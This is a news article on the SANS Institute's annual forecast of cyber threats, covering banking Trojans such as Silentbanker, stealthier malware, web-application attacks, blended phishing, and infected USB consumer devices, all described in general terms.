Expect increased attacks on Web browsers, more botnets, and sophisticated cyberespionage, according to the annual SANS Institute report.
Advanced identity theft bots appear sixth on the SANS list. "A new generation of identity theft is being powered by bots that stay on machines for three to five months collecting passwords, bank account information, surfing history, frequently used e-mail addresses, and more," the SANS report said. "They'll gather enough data to enable extortion attempts (against people who surf child porn sites, for example) and advanced identify theft attempts where criminals have enough data to pass basic security checks."
A Trojan program, Trojan.Silentbanker, described on Monday in a Symantec blog post represents one such bot. "The ability of this Trojan to perform man-in-the-middle attacks on valid transactions is what is most worrying," said Symantec researcher Liam OMurchu. "The Trojan can intercept transactions that require two-factor authentication. It can then silently change the user-entered destination bank account details to the attacker's account details instead."
The sophistication of Trojan.Silentbanker and other malware like Storm and Nugache reflects the seventh-ranked item on the SANS list: The increasing maliciousness of malware. Malware is not only becoming more insidious, but more aggressive in its quest for self-preservation. The SANS researchers see malware increasingly taking the offensive against malware fighters and their systems. They also see malware becoming increasingly stealthy, hiding its malicious nature to strike more effectively. This also is happening at a network level, where fast-flux DNS techniques are being refined to better conceal malware server infrastructure.
Web application vulnerabilities, such as cross-site scripting and SQL injection attacks, rank eighth on the list. "Until 2007, few criminals attacked these vulnerable sites because other attack vectors were more likely to lead to economic or information access advantage," the SANS report said. "Increasingly, however, advances in XSS and other attacks have demonstrated that criminals looking for financial gain can exploit vulnerabilities resulting from Web programming errors as new ways of penetrating important organizations."
As if to prove the point, a massive SQL attack was reported last week. And the security experts who participated in this SANS report expect more such attacks in 2008.
Coming in at number nine, the SANS report anticipates a rise in blended and event-based attacks. Such attacks might rely on a provocative fake headline to entice recipients to open a malicious message. Or they might combine a phishing attack with an inducement to reveal personal information over the phone. An example of such an attack is the phony Federal Trade Commission e-mail notice sent Saleforce.com users last October that installed malware when the message was opened.
Last, the SANS report cites the rising risk of supply chain attacks affecting consumer devices. "The widespread adoption of the USB standard combined with cheap memory and consumer demand for more computer peripherals makes this vector a simple target for a sophisticated attacker," explained Marc Sachs, executive director of government affairs for national security policy at Verizon and director of the SANS Institute's Internet Storm Center, in an e-mail last week. "Pranksters like it, too. It's a simple matter to purchase an item at Best Buy or Target, bring it home, infect it as a joke, and return it. Most large stores have a 'no questions asked' return policy within a week or two of purchase. Even worse, most stores will quickly test a returned item and ,if it appears to work, will reshrink-wrap it, put a price sticker on it, and return it to the shelf."
Despite recent reports of malware-infected digital picture frames and other devices, such attacks aren't likely to match the broad impact of the Storm Trojan. Nonetheless, they're well-suited for targeted attacks, and those tend to be more damaging than less discriminating attacks.
Building A Mobile Business MindsetAmong 688 respondents, 46% have deployed mobile apps, with an additional 24% planning to in the next year. Soon all apps will look like mobile apps – and it's past time for those with no plans to get cracking.